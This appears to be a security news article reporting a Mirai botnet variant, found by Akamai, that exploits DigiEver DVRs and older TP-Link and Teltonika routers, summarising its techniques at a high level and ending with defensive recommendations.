Cybersecurity researchers at Akamai have uncovered a sophisticated new variant of the notorious Mirai botnet that specifically targets DigiEver DS-2105 Pro digital video recorders and outdated TP-Link routers. The malicious campaign, which began in October 2023, demonstrates an alarming increase in both scope and complexity, presenting a significant threat to IoT device security.
Technical Analysis of the Attack Vector
The primary attack vector exploits a critical Remote Code Execution (RCE) vulnerability in DigiEver DVR devices through the /cgi-bin/cgi_main.cgi component. This security flaw enables unauthorized attackers to execute arbitrary commands using specially crafted HTTP POST requests, manipulating the NTP parameter. The attack methodology shows sophisticated engineering, utilizing curl and chmod commands to establish persistent access to compromised systems.
Expanded Attack Surface and Propagation Methods
Beyond DigiEver devices, this Mirai variant actively exploits multiple vulnerabilities, including CVE-2023-1389 affecting TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. The malware demonstrates advanced persistence mechanisms through cron job manipulation, ensuring sustained control over infected devices while evading detection methods.
Advanced Technical Capabilities
This iteration of Mirai showcases significant improvements in its technical architecture, implementing sophisticated encryption methods including XOR and ChaCha20 algorithms. The malware’s multi-architecture compatibility spans x86, ARM, and MIPS platforms, substantially expanding its potential target base and making it particularly dangerous in the IoT ecosystem.
Key Security Features and Innovations
The botnet’s enhanced capabilities include automated exploitation tools, credential stuffing mechanisms, and advanced DDoS attack modules. These improvements make it significantly more effective at both initial compromise and subsequent malicious activities, including network propagation and coordinated attacks.
Security experts strongly advise implementing immediate protective measures, including regular firmware updates, strong password policies, and strict access controls for administrative interfaces. Organizations should conduct thorough security audits of their IoT infrastructure, particularly focusing on DVR systems and network devices. The implementation of network segmentation and continuous monitoring solutions can significantly reduce the risk of compromise and limit the potential impact of successful attacks.
